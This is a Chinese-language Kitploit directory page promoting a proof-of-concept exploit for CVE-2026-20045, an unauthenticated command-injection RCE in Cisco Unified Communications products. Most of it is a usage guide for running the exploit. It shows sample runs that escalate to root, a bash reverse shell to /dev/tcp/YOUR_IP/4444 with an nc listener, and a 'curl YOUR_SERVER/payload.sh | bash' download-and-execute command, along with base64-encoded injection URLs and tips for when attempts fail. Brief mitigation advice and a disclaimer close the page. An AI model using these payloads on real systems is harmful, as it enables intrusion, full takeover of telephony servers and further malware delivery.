Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Ashwesker-CVE-2026-20045 — CVE-2026-20045 的概念验证漏洞利用程序,这是 Cisco Unified Communications 产品中的一个严重未认证远程代码执行漏洞,可实现命令注入、反弹 Shell 以及 root 权限提升。 | Kitploit
工具/GitHubGitHub/dkstar11q/ashwesker-cve-2026-20045
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubdkstar11q/ashwesker-cve-2026-20045

Ashwesker-CVE-2026-20045

CVE-2026-20045 的概念验证漏洞利用程序,这是 Cisco Unified Communications 产品中的一个严重未认证远程代码执行漏洞,可实现命令注入、反弹 Shell 以及 root 权限提升。

查看仓库
637个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚨 CVE-2026-20045 — 零日漏洞深度解析 🚨

Cisco AsyncOS 0-Day Vulnerability

🧨 这是什么

一个影响多个 Cisco Unified Communications 产品的 严重远程代码执行(RCE) 漏洞。在补丁发布之前,该漏洞已在野外被积极利用。


🔥 为什么危险

  • 🚫 无需身份验证
  • 🖥️ 远程代码执行
  • 👑 可能获得 root 级访问权限
  • 🌍 已确认的真实世界利用

这意味着攻击者可以远程完全接管受影响的系统。


🚨 CVE-2026-20045.py 使用示例

这里是一份精心整理的指南,包含 使用示例,用于运行 PoC 脚本,包括 如果漏洞利用在存在漏洞的 Cisco Unified Communications 目标(未修补的 Web 界面暴露)上成功,你在终端中会看到的确切内容。我添加了一些表情符号、彩色代码块(通过 markdown)和结构化章节,以提高可读性。😎

1. 基本系统信息测试

此命令运行简单命令以获取用户 ID、用户名和系统详细信息。

命令:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "id && whoami && uname -a"  

如果成功你会看到的内容(成功输出):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGlkICYmIHdob2FtaSAmJiB1bmFtZSAtYSAj  
[*] Initial command: id && whoami && uname -a  
[+] Stage 1 likely succeeded! Status: 200  
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgaWQgJiYgd2hvYW1pICYmIHVuYW1lIC1h  
[+] Stage 2 (root escalation) likely succeeded! Status: 200  

[+] Possible command output:  
------------------------------------------------------------  
uid=0(root) gid=0(root) groups=0(root)  
root  
Linux ucm-server 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:44:33 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux  
------------------------------------------------------------  

🔑 关键标志:绿色 [+] 指示符、HTTP 200 状态以及输出块中的命令结果。如果没有显示输出但状态为 200,则说明它仍然静默成功了!

2. 反向 Shell 设置

这会向你的机器生成一个交互式 shell。首先,启动一个监听器:nc -lvnp 4444。

命令:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"  

如果成功你会看到的内容(在脚本终端中):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGJhc2ggLWkgPiYgL2Rldi90Y3AvWU9VUl9JUC80NDQ0IDAmPjEgIw==  
[*] Initial command: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1  
[+] Stage 1 likely succeeded! Status: 200  
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgYmFzaCAtaSA+JiAvZGV2L3RjcC9ZT1VSX0lQLzQ0NDQgMD4mMQ==  
[+] Stage 2 (root escalation) likely succeeded! Status: 200  
[+] Command executed silently (check target for effects)  

你在监听器(nc)终端中会看到的内容:

root@kitploit:~
listening on [any] 4444 ...  
connect to [YOUR_IP] from (UNKNOWN) [TARGET_IP] 54321  
bash: cannot set terminal process group (1234): Inappropriate ioctl for device  
bash: no job control in this shell  
root@ucm-server:~# id  
uid=0(root) gid=0(root) groups=0(root)  
root@ucm-server:~#  

🚀 关键标志:脚本显示成功消息;监听器立即获得 root shell 提示符。在那里输入命令进行交互!

3. 文件下载并执行(例如,自定义 Payload)

这会从你的服务器下载并运行一个脚本。

命令:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "curl -s http://YOUR_SERVER/payload.sh | bash"  

如果成功你会看到的内容(成功输出):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGN1cmwgLXMgaHR0cDovL1lPVVJfU0VSVkVSL3BheWxvYWQuc2ggfCBiYXNoICM=  
[*] Initial command: curl -s http://YOUR_SERVER/payload.sh | bash  
[+] Stage 1 likely succeeded! Status: 200  
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgY3VybCAtcyBodHRwOi8vWU9VUl9TRVJWRVIvcGF5bG9hZC5zaCB8IGJhc2g=  
[+] Stage 2 (root escalation) likely succeeded! Status: 200  
[+] Command executed silently (check target for effects)  

📥 关键标志:200 状态码;在目标上验证(例如,检查日志/文件)或在你的服务器上验证(下载日志)。如果 payload 是静默的,则没有直接输出。

💡 专业提示:

  • 如果需要网络权限,请使用 sudo 运行。
  • 使用 HTTPS 目标;脚本会处理自签名证书。
  • 如果失败(例如,404/403),请尝试其他路径或检查目标是否已修补。
  • 始终进行道德测试!😈

🧩 受影响产品

  • ☎️ Cisco Unified Communications Manager(Unified CM)
  • 🧑‍💼 Unified CM Session Management Edition(SME)
  • 💬 IM & Presence Service
  • 📞 Cisco Unity Connection
  • ☁️ Webex Calling Dedicated Instance

🧠 根本原因

HTTP 管理接口中对用户提供的输入验证不当,导致 命令注入,进而引发远程代码执行。


📊 严重性

  • CVSS 评分: 8.2(高危)
  • 业务影响: 严重

🛡️ 缓解与防御

  • ⚡ 立即应用 Cisco 补丁
  • 🔒 限制对管理接口的访问
  • 🌐 避免将系统直接暴露在互联网上
  • 👀 监控日志以发现可疑的 HTTP 活动
  • 🏛️ 如适用,遵循政府漏洞修复指南

🔒 免责声明:

所有 PoC 代码仅用于在授权系统上进行道德、教育用途。未经授权的利用是非法的;对滥用行为不承担任何责任。😈

下载工具